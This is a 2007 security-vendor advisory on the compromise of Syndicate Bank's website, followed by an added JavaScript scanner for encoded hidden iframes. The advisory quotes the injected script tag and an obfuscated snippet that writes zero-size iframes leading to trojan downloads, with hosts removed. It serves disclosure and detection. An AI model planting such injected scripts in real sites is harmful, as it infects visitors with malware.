WSLabs, Malicious Web site / Malicious Code: Syndicate Bank site compromised
Posted on 17 August 2007
Websense® Security Labs™ has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in) was compromised with a malicious script that attempts to exploit multiple vulnerabilities. When customers visit the web site, a malicious JavaScript file (e.js) is executed and creates two additional iframes in the page.
<script src=http://< URL REMOVED >/e.js></script>
Snippet of js code:
document.writeln("//xxxx mca By Mr.0wen//");
document.writeln("document.write(unescape("%3CIFraMe < URL REMOVED >IFraMe < URL REMOVED >wIdth%3D%220%22%20heIght%3D%220%22%20FraMebOrder %3D%220%22%3E%3C/IFraMe%3E"));");
document.writeln("//xxxx mca By Mr.0wen//");
The JavaScript from e.js (seen above) creates two new IFRAME elements within the page. One IFRAME attempts to load exploit code, and the other creates several additional IFRAMEs that contain advertisement-related content. The exploit will try to load a Trojan Downloader (qq.exe), which will contact a remote server to download the following Trojan Downloader and Backdoor:
http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe
The site appears to have been cleaned a few hours ago.
For additional details and information on how to detect and prevent this type of attack:
http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=794
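An added example, not part of the Websense alert: a static check for the pattern shown in the e.js snippet, where a percent-encoded, mixed-case IFRAME with zero width and height is written through document.write(unescape(...)). The function names, the depth limit and the sample input (with the placeholder host example.invalid) are assumptions made for illustration.

```javascript
// Added example, not from the Websense alert. SAMPLE is constructed and
// example.invalid is a placeholder host.
const ENCODED_CALL = /(?:unescape|decodeURIComponent)\s*\(\s*\\?["']([^"'\\]+)/gi;
const IFRAME_TAG = /<iframe\b[^>]*>/gi;

// unescape()-style decoding of %XX and %uXXXX; malformed sequences are left as-is.
function decodeLayer(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Case-insensitive attribute lookup inside one tag, quoted or unquoted value.
function attr(tag, name) {
  const m = new RegExp("(?:^|\\s)" + name + "\\s*=\\s*[\"']?([^\"'\\s>]+)", "i").exec(tag);
  return m ? m[1] : null;
}

// A frame counts as hidden when width or height is zero, or CSS hides it.
function isHidden(tag) {
  const zero = (v) => v !== null && parseInt(v, 10) === 0;
  return zero(attr(tag, "width")) || zero(attr(tag, "height")) ||
    /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
}

// Scans the raw source, then each decoded string literal, up to maxDepth layers.
function findHiddenIframes(source, maxDepth = 3) {
  const findings = [];
  let layers = [source];
  for (let depth = 0; depth <= maxDepth && layers.length > 0; depth++) {
    const next = [];
    for (const text of layers) {
      for (const t of text.matchAll(IFRAME_TAG)) {
        if (isHidden(t[0])) findings.push({ depth, src: attr(t[0], "src"), tag: t[0] });
      }
      for (const m of text.matchAll(ENCODED_CALL)) next.push(decodeLayer(m[1]));
    }
    layers = next;
  }
  return findings;
}

// Constructed sample: one encoded hidden frame and one ordinary visible frame.
const SAMPLE = [
  'document.writeln("document.write(unescape(\\"%3CIFraMe%20src%3D%22http%3A//example.invalid/a.htm%22%20wIdth%3D%220%22%20heIght%3D%220%22%20FraMebOrder%3D%220%22%3E%3C/IFraMe%3E\\"));");',
  '<iframe src="/branch-locator.html" width="600" height="400"></iframe>',
].join("\n");

console.log(findHiddenIframes(SAMPLE));
```

The depth field in each finding tells a reviewer whether the frame was visible in the raw page source (0) or only appeared after decoding, which is the stronger signal of deliberate concealment.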